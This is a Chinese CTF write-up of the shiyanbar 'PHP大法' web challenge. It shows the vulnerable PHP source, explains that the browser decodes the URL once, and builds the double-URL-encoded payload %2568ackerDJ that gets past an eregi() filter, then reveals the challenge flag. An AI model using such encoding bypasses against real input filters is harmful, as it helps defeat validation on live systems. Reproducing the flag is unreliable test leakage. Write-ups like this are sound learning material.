zoukankan html css js c++ java

实验吧Web-PHP大法

笔记
字符串比对解析，与大小写无关。
eregi()函数
语法:  eregi(string pattern, string string, array [regs]);
返回值: 整数/数组
特点：PHP函数eregi()与大小写无关，类似函数ereg() 则区分大小写
例：if (eregi("C","abcdef") 　　//true

URl双编码： 将经过url编码产生的'%'再次编码，及把'%'替换为'%25'

链接： http://www.shiyanbar.com/ctf/54

页面情况

获得提示： index.php.txt

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>

<br><br>
Can you authenticate to this website?

首先eregi()函数进行一次比较判断，如果想打印flag,id不能等于"hackerDJ" ，并且经过url解码后id等于"hackerDJ"

但这里需要注意的是：在浏览器中提交时浏览器会为我们进行一次解码

可以在本地执行下面的代码:

<?php
$id = '%68ackerDJ';
if(eregi("hackerDJ",$id)) {
  echo("<p>not allowed!</p>");
  exit();
}

$id = urldecode($id);
if($id == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>

可以看到成功打印，说明浏览器的确为我们转换了一次


因此我们需要进行两次编码: h --> %68 --> %2568

构造url: index.php?id=%2568ackerDJ

提交即可获得flag: 　　flag: DUTCTF{PHP_is_the_best_program_language}

查看全文

相关阅读:
Week7 作业 A
Mouth 1 模拟题 CSP201512-3 画图
 C++出现：error: passing 'const Employee' as 'this' argument of 'int Employee::getSalary()' discards qualifiers [-fpermissive]
C++出现error: no match for call to '(MyCompare) (const key_type&, const Person&)'
CentOS 7出现ifconfig:command not found
有效清理C盘内存
 重装系统之后出现https:/ / logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_xxvbETmiVPe1AsI9xwHp3A2.js
C++/QT运行时出现void value not ignored as it ought to be
运行QT项目文件夹下的exe文件提示找不到“各种dll”
Ubuntu16.04配置OpenCV3.2.0

原文地址：https://www.cnblogs.com/ssooking/p/5901440.html